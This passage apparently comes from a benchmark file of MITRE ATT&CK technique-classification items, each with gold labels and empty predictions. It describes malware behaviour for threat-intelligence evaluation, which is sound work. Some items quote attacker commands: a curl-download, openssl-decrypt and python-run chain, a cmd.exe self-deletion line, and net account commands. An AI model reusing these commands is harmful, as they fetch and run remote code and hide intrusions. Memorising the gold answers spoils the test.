malware.", + "gold": "- T1204.002: User Execution - Malicious File", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: 1) Using the compromised SolarWinds DLL to activate a backdoor that enables attackers to remotely control and operate on a device 2) Using the backdoor access to steal credentials, escalate privileges, and move laterally to gain the ability to create valid SAML tokens using any of two methods: Stealing the SAML signing certificate (Path 1) Adding to or modifying existing federation trust (Path 2) 3) Stealing the SAML signing certificate (Path 1) 4) Adding to or modifying existing federation trust (Path 2) 5) Using attacker-created SAML tokens to access cloud resources and perform actions leading to the exfiltration of emails and persistence in the cloud\n\t - T1047: Windows Management Instrumentation\n- Text: Dtrack can collect network and active connection information.\n\t - T1049: System Network Connections Discovery\n- Text: The dropper copies the system file rundll32.exe to the install location for the malware, then uses the copy of rundll32.exe to load and execute the main component.\n\t - T1218.011: System Binary Proxy Execution - Rundll32\n", + "input": "Sibot has used WMI to discover network connections and configurations. Sibot has also used the Win32_Process class to execute a malicious DLL.", + "gold": "- T1047: Windows Management Instrumentation", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: Catchamas adds a new service named NetAdapter in an apparent attempt to masquerade as a legitimate service.\n\t - T1036.004: Masquerading - Masquerade Task or Service\n- Text: Leviathan has created new email accounts for targeting efforts.\n\t - T1585.002: Establish Accounts - Email Accounts\n- Text: MSTIC has observed NICKEL drop their malware into existing installed software paths. They did this to make their malware appear to be files used for an installed application. The following are example paths\n\t - T1036.005: Masquerading - Match Legitimate Name or Location\n", + "input": "Accounts created by Dragonfly masqueraded as legitimate service accounts.", + "gold": "- T1036: Masquerading", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: Sandworm Team has exfiltrated internal documents, files, and other data from compromised hosts.\n\t - T1005: Data from Local System\n- Text: Machete hijacks the clipboard data by creating an overlapped window that listens to keyboard events.\n\t - T1115: Clipboard Data\n- Text: As we can see, the following information is present within this configuration: Remote Command and Control (C2) server Remote port Sleep timer Reaver continues to collect various information from the victim machine, including the following: CPU speed Computer name Username IP Address Microsoft Windows version Physical and virtual memory information The malware proceeds to communicate with the remote server via HTTP GET and POST requests\n\t - T1082: System Information Discovery\n", + "input": "WarzoneRAT can collect data from a compromised host.", + "gold": "- T1005: Data from Local System", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: Cardinal RAT establishes Persistence by setting the \"HKCU\\Software\\Microsoft\\Windows NT\\CurrentVersion\\Windows\\Load\" Registry key to point to its executable.\n\t - T1547.001: Boot or Logon Autostart Execution - Registry Run Keys / Startup Folder\n- Text: Note that the browser itself is not hooked. Executing the browser from any other Chrome shortcut link will start and run it normally without the malicious extension, canceling out the malware\u2019s ability to control what the victim does\n\t - T1547.009: Boot or Logon Autostart Execution - Shortcut Modification\n- Text: If a victim meets certain criteria, T9000 uses the AppInit_DLL functionality to achieve persistence by ensuring that every user mode process that is spawned will load its malicious DLL, ResN32.dll. It does this by creating the following Registry keys: \"HKLM\\Software\\Microsoft\\Windows NT\\CurrentVersion\\Windows\\AppInit_DLLs \u2013 %APPDATA%\\Intel\\ResN32.dll\" and \"HKLM\\Software\\Microsoft\\Windows NT\\CurrentVersion\\Windows\\LoadAppInit_DLLs \u2013 0x1\".\n\t - T1546.010: Event Triggered Execution - AppInit DLLs\n", + "input": "Metamorfo has configured persistence to the Registry ket \"HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run, Spotify =% APPDATA%\\Spotify\\Spotify.exe\" and used .LNK files in the startup folder to achieve persistence.", + "gold": "- T1547.001: Boot or Logon Autostart Execution - Registry Run Keys / Startup Folder", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: Part of packed VM PCODE After unpacking, the PCODE it will look like the following: Unpacked PCODE After unpacking the virtual machine PCODE is then decrypted: Decrypted VM PCODE The custom virtual machine supports a total of 34 instructions: Example of parsed PCODE In this example, the \u201c1b\u201d instruction is responsible for executing native code that is specified in parameter field\n\t - T1140: Deobfuscate/Decode Files or Information\n\t - T1027.001: Obfuscated Files or Information - Binary Padding\n\t - T1027.002: Obfuscated Files or Information - Software Packing\n\t - T1497: Virtualization/Sandbox Evasion\n- Text: BlackEnergy has removed the watermark associated with enabling the \"TESTSIGNING\" boot configuration option by removing the relevant strings in the \"user32.dll.mui\" of the system.\n\t - T1070: Indicator Removal\n- Text: Cobalt Strike can use spoof arguments in spawned processes that execute beacon commands.\n\t - T1564.010: Hide Artifacts - Process Argument Spoofing\n", + "input": "CSPY Downloader can search loaded modules, PEB structure, file paths, Registry keys, and memory to determine if it is being debugged or running in a virtual environment.", + "gold": "- T1497.001: Virtualization/Sandbox Evasion - System Checks", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: JCry has been observed deleting shadow copies to ensure that data cannot be restored easily.\n\t - T1490: Inhibit System Recovery\n- Text: Much like the original payload, this tool uses if/else statements to skip the legitimate code in the Saransh Email System source to run the malicious functions, which have the same method names as the original tool and follow the same call sequence: Form1.Speed Form1.diomadnfagaghagh Form1.fjcsERIfjfiojsGHIsdifjksi Form1.gsgjIDJIGJIGJIGJIFDOSpl Form1.FJaioefgkaoeK This chain of functions eventually loads a resource named \u2018GSrdofjksrgj\u2019, which the tool decrypts using the same algorithm and key as in the initial payload:byte[] array4 = new byte[] { 19, 129, 43, 37, 56, 65, 255, 75, 111, 19, 211, 120, 0, 49, 126, 248 };The decrypted payload has a SHA256 hash of 5e805a88294f6d25d55103d19d13e798e01ad70e6b89e9c58db5d468cc63b3d5, which is a variant of the NanoCore remote administration tool\n\t - T1569.002: System Services - Service Execution\n- Text: Indrik Spider has used PsExec to stop services prior to the execution of ransomware.\n\t - T1489: Service Stop\n", + "input": "HermeticWiper can disable the VSS service on a compromised host using the service control manager.", + "gold": "- T1490: Inhibit System Recovery", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: first attempts to use a Base64-encoded network protocol over a raw TCP socket for C2, and if that method fails, falls back to a secondary HTTP-based protocol to communicate to an alternate C2 server.\n\t - T1008: Fallback Channels\n- Text: DarkWatchman uses HTTPS for command and control.\n\t - T1071.001: Application Layer Protocol - Web Protocols\n- Text: Gelsemium has used dynamic DNS in its C2 infrastructure.\n\t - T1568: Dynamic Resolution\n", + "input": "NETEAGLE will attempt to detect if the infected host is configured to a proxy. If so, NETEAGLE will send beacons via an HTTP POST request. NETEAGLE will also use HTTP to download resources that contain an IP address and Port Number pair to connect to for further C2.", + "gold": "- T1071.001: Application Layer Protocol - Web Protocols", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: The \"net user username \\password\" commands in Net can be used to create a local account.\n\t - T1136.001: Create Account - Local Account\n- Text: APT3 has been known to add created accounts to local admin groups to maintain elevated access.\n\t - T1098: Account Manipulation\n- Text: TeamTNT has added RSA keys in \"authorized_keys\".\n\t - T1098.004: Account Manipulation - SSH Authorized Keys\n", + "input": "Calisto has the capability to add its own account to the victim's machine.", + "gold": "- T1136.001: Create Account - Local Account", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: \"beacon\" payload is capable of capturing screen shots.\n\t - T1113: Screen Capture\n- Text: automatically searches for files on local drives based on a predefined list of file extensions and sends them to the command and control server every 60 minutes. also automatically sends keylogger files and screenshots to the C2 server on a regular timeframe.\n\t - T1020: Automated Exfiltration\n- Text: Zebrocy scans the system and automatically collects files with the following extensions: .doc, .docx, ,.xls, .xlsx, .pdf, .pptx, .rar, .zip, .jpg, .jpeg, .bmp, .tiff, .kum, .tlg, .sbx, .cr, .hse, .hsf, and .lhz.\n\t - T1119: Automated Collection\n", + "input": "Remcos takes automated screenshots of the infected machine.", + "gold": "- T1113: Screen Capture", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: The dns.ps1 script is also responsible for communicating with the C2 server, but it uses DNS queries to send data to the server. The DNS queries sent by this script are queries to subdomains on the same domain as the C2 server, which contains system information or the contents of files from the system. The subdomain of the DNS request that acts as the initial C2 beacon has the following structure\n\t - T1012: Query Registry\n- Text: NotPetya determines if specific antivirus programs are running on an infected host machine.\n\t - T1518.001: Software Discovery - Security Software Discovery\n- Text: OSX_OCEANLOTUS.D has variants that check a number of system parameters to see if it is being run on real hardware or in a virtual machine environment, such as \"sysctl hw.model\".\n\t - T1497.001: Virtualization/Sandbox Evasion - System Checks\n", + "input": "Crimson can check the Registry for the presence of \"HKCU\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\last_edate\" to determine how long it has been installed on a host.", + "gold": "- T1012: Query Registry", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: For all non-removable drives on a victim, executes automated collection of certain files for later exfiltration.\n\t - T1119: Automated Collection\n- Text: APT29 obtained Ticket Granting Service (TGS) tickets for Active Directory Service Principle Names to crack offline.\n\t - T1558.003: Steal or Forge Kerberos Tickets - Kerberoasting\n- Text: No matching sample found for T1557.002\n", + "input": "Empire can use Inveigh to conduct name service poisoning for credential theft and associated relay attacks.", + "gold": "- T1557.001: Adversary-in-the-Middle - LLMNR/NBT-NS Poisoning and SMB Relay", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: Stealth Falcon malware uses PowerShell commands to perform various functions, including gathering system information via WMI and executing commands from its C2 server.\n\t - T1059.001: Command and Scripting Interpreter - PowerShell\n- Text: collects the group name of the logged-in user and sends it to the C2.\n\t - T1069: Permission Groups Discovery\n- Text: JSS Loader can download and execute JavaScript files.\n\t - T1059.007: Command and Scripting Interpreter - JavaScript\n", + "input": "GRIFFON has used PowerShell to execute the Meterpreter downloader TinyMet.", + "gold": "- T1059.001: Command and Scripting Interpreter - PowerShell", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: TeamTNT has checked for running containers with \"docker ps\" and for specific container names with \"docker inspect\". TeamTNT has also searched for Kubernetes pods running in a local network.\n\t - T1613: Container and Resource Discovery\n- Text: TYPEFRAME can execute commands using a shell.\n\t - T1059: Command and Scripting Interpreter\n- Text: SharpStage can use WMI for execution.\n\t - T1047: Windows Management Instrumentation\n", + "input": "MarkiRAT can utilize cmd.exe to execute commands in a victim's environment.", + "gold": "- T1059.003: Command and Scripting Interpreter - Windows Command Shell", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: Patchwork copied all targeted files to a directory called index that was eventually uploaded to the C&C server.\n\t - T1074.001: Data Staged - Local Data Staging\n- Text: discovers shares on the network\n\t - T1135: Network Share Discovery\n- Text: BitPaymer can enumerate the sessions for each user logged onto the infected host.\n\t - T1087.001: Account Discovery - Local Account\n", + "input": "During C0015, PowerView's file share enumeration results were stored in the file `c:\\ProgramData\\found_shares.txt`.", + "gold": "- T1074.001: Data Staged - Local Data Staging", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: The loaded module is a simple dropper. Upon loading the module, the AutoOpen method will be invoked. The malicious code in this method drops the final payload executable into %AppData%\\service.exe and executes it (see Figure 6)\n\t - T1574.005: Hijack Execution Flow - Executable Installer File Permissions Weakness\n\t - T1574: Hijack Execution Flow\n\t - T1569.002: System Services - Service Execution\n\t - T1543.003: Create or Modify System Process - Windows Service\n- Text: Replying to @ESETresearchAttackers replaced win_fw.dll, an internal component that is executed during IDA Pro installation, with a malicious DLL. The malicious win_fw.dll creates a Windows scheduled task that starts a second malicious component, idahelper.dll, from the IDA plugins folder\n\t - T1036.004: Masquerading - Masquerade Task or Service\n\t - T1574.002: Hijack Execution Flow - DLL Side-Loading\n- Text: If running as administrator, TDTESS installs itself as a new service named bmwappushservice to establish persistence.\n\t - T1543.003: Create or Modify System Process - Windows Service\n", + "input": "Denis replaces the nonexistent Windows DLL \"msfte.dll\" with its own malicious version, which is loaded by the SearchIndexer.exe and SearchProtocolHost.exe.", + "gold": "- T1574: Hijack Execution Flow", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: We observed the threat group upload a second stage malware, known as BUBBLEWRAP (also known as Backdoor.APT.FakeWinHTTPHelper) to their Dropbox account along with the following command\n\t - T1049: System Network Connections Discovery\n\t - T1069.001: Permission Groups Discovery - Local Groups\n- Text: Bankshot gathers domain and account names/information through process monitoring.\n\t - T1087.001: Account Discovery - Local Account\n\t - T1087.002: Account Discovery - Domain Account\n- Text: Ke3chang performs account discovery using commands such as \"net localgroup administrators\" and \"net group \"REDACTED\" /domain\" on specific permissions groups.\n\t - T1087.001: Account Discovery - Local Account\n\t - T1087.002: Account Discovery - Domain Account\n", + "input": "Operation Wocao has used the command \"net localgroup administrators\" to list all administrators part of a local group.", + "gold": "- T1069.001: Permission Groups Discovery - Local Groups", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: The use of the choice command, as seen below, did not appear in previous versions of OopsIE and appears to have been added in the most recent version used in this attack. cmd.exe /C choice /C Y /N /D Y /T 2 & Del After sleeping, the Trojan will create a GUID and write it to %APPDATA%\\Windows\\GDI.bin. With the Trojan moved its final location, it will then create a scheduled task to run a VBScript to make sure it runs persistently. The Trojan accesses two resources, named Sch and VBS that contains obfuscated strings that contain the command to create the scheduled task and the VBScript to run. This differs from the previous OopsIE variant that used a hardcoded task name for the scheduled task. This process ultimately attempts to run the Trojan every three minutes, which is important as OopsIE relies on this scheduled task as it does not include a main loop to continue its execution. After creating this scheduled task for persistence, the Trojan will begin communicating with its C2 server. The process in which the Trojan communicates with its C2 server is very similar to the previous OopsIE Trojan that we discussed in our previous blog. Also, the oops string used to signify and erroneous transmission from the C2, which gave OopsIE its name is reversed to spoo. The command handler in this OopsIE variant is very similar to the previous version, as it contains the same three (1, 2 and 3) commands seen in Table 2\n\t - T1059.005: Command and Scripting Interpreter - Visual Basic\n- Text: installs a copy of itself in a randomly selected service, then overwrites the ServiceDLL entry in the service's Registry entry.\n\t - T1543.003: Create or Modify System Process - Windows Service\n- Text: uses rundll32.exe in a Registry Run key value for execution as part of its persistence mechanism.\n\t - T1218.011: System Binary Proxy Execution - Rundll32\n", + "input": "STARWHALE can use the VBScript function `GetRef` as part of its persistence mechanism.", + "gold": "- T1059.005: Command and Scripting Interpreter - Visual Basic", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: PowerDuke hides many of its backdoor payloads in an alternate data stream (ADS).\n\t - T1564.004: Hide Artifacts - NTFS File Attributes\n- Text: Amadey has modified the `:Zone.Identifier` in the ADS area to zero.\n\t - T1553.005: Subvert Trust Controls - Mark-of-the-Web Bypass\n- Text: No matching sample found for T1564.007\n", + "input": "Astaroth can abuse alternate data streams (ADS) to store content for malicious payloads.", + "gold": "- T1564.004: Hide Artifacts - NTFS File Attributes", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: service-based DLL implant traverses the FTP server\u2019s directories looking for files with keyword matches for computer names or certain keywords.\n\t - T1083: File and Directory Discovery\n- Text: Besides the stolen data, it sends the Windows product name and version, username, computer name, and domain name to the C&C server\n\t - T1082: System Information Discovery\n- Text: Emails dating more than three years prior to malware execution have been included in the collected EmailStorage folder, meaning that there may not be a date limit for the email enumerator. There is a lack of keywords or other limiting pattern by which specific email messages in local mailboxes were targeted for exfiltration. Kroll has identified instances where specific email messages were deleted within the EmailStorage folder. In some instances, the entire EmailStorage folder is deleted once messages have all been exfiltrated. Based on observed cases, there was no evidence that attachments were included in the collected data. Kroll collaborators at the National Cyber Forensics Training Alliance (NCFTA) observed Qakbot samples sending SMTP traffic indicative of outbound spam thread hijackings\n\t - T1074.001: Data Staged - Local Data Staging\n", + "input": "Cannon can obtain victim drive information as well as a list of folders in C:\\Program Files.", + "gold": "- T1083: File and Directory Discovery", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: achieves persistence by creating a shortcut to itself in the CSIDL_STARTUP directory.\n\t - T1547.009: Boot or Logon Autostart Execution - Shortcut Modification\n\t - T1547.001: Boot or Logon Autostart Execution - Registry Run Keys / Startup Folder\n- Text: Persistence Mechanism Figure 3 shows that for persistence, the document creates two scheduled tasks and creates one auto-start registry entry pointing to the LNK file\n\t - T1053.005: Scheduled Task/Job - Scheduled Task\n\t - T1547.001: Boot or Logon Autostart Execution - Registry Run Keys / Startup Folder\n- Text: Sidewinder has named malicious files \"rekeywiz.exe\" to match the name of a legitimate Windows executable.\n\t - T1036.005: Masquerading - Match Legitimate Name or Location\n", + "input": "Helminth establishes persistence by creating a shortcut in the Start Menu folder.", + "gold": "- T1547.001: Boot or Logon Autostart Execution - Registry Run Keys / Startup Folder", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: Gamaredon Group has compiled the source code for a downloader directly on the infected system using the built-in \"Microsoft.CSharp.CSharpCodeProvider\" class.\n\t - T1027.004: Obfuscated Files or Information - Compile After Delivery\n- Text: During Frankenstein, the threat actors used MSbuild to execute an actor-created file.\n\t - T1127.001: Trusted Developer Utilities Proxy Execution - MSBuild\n- Text: decodes Base64 strings and decrypts strings using a custom XOR algorithm.\n\t - T1140: Deobfuscate/Decode Files or Information\n", + "input": "MuddyWater has used the .NET csc.exe tool to compile executables from downloaded C# code.", + "gold": "- T1027.004: Obfuscated Files or Information - Compile After Delivery", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: The Delphi variant of Zebrocy delivered in this attack campaign are very similar to the Delphi downloader discussed in our previous Zebrocy research published in June 2018. While this Delphi variant was known, the C# and VB.NET variants delivered in this attack campaign were previously unknown. An interesting note on these payloads is that all the Delphi payloads delivered in this campaign were packed with UPX, while none of the other payloads were packed. While we can only speculate on the specific reason, it is likely Sofacy packed only the Delphi variants in an attempt to increase evasion as the Delphi variant of Zebrocy is known and has been widely analyzed\n\t - T1027.002: Obfuscated Files or Information - Software Packing\n- Text: KONNI can take screenshots of the victim\u2019s machine.\n\t - T1113: Screen Capture\n- Text: jRAT can capture microphone recordings.\n\t - T1123: Audio Capture\n", + "input": "yty packs a plugin with UPX.", + "gold": "- T1027.002: Obfuscated Files or Information - Software Packing", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: HotCroissant can retrieve a list of applications from the \"SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\App Paths\" registry key.\n\t - T1518: Software Discovery\n- Text: As seen below, the relational analysis proved to be quite fruitful: Figure 1 Overview of relationships We rapidly discovered a different set of tools communicating to the exact same C2 servers as those two Word documents, in addition to other tools communicating to other subdomain variations of chrome-up[.]date as seen in the following graphic: Figure 2 Command and control overlaps From there, we were able to map out a large infrastructure separating out into four categories of tools: downloaders, droppers, loaders, and payloads\n\t - T1518.001: Software Discovery - Security Software Discovery\n- Text: has a command to get text of the current foreground window.\n\t - T1010: Application Window Discovery\n", + "input": "Dyre has the ability to identify installed programs on a compromised host.", + "gold": "- T1518: Software Discovery", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: Comnie collects the hostname of the victim machine.\n\t - T1082: System Information Discovery\n- Text: Kwampirs collects a list of accounts with the command \"net users\".\n\t - T1087.001: Account Discovery - Local Account\n- Text: BlackEnergy has gathered information about network IP configurations using ipconfig.exe and about routing tables using route.exe.\n\t - T1016: System Network Configuration Discovery\n", + "input": "Moses Staff collected information about the infected host, including the machine names and OS architecture.", + "gold": "- T1082: System Information Discovery", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: The app executes the following shell command to download a custom-compiled version of the EggShell server for macOS: nohup curl -k -L -o /tmp/.info.enc https://github.com/youarenick/newProject/raw/master/info.enc; openssl enc -aes-256-cbc -d -in /tmp/.info.enc -out /tmp/.info.py -k 111111qq; python 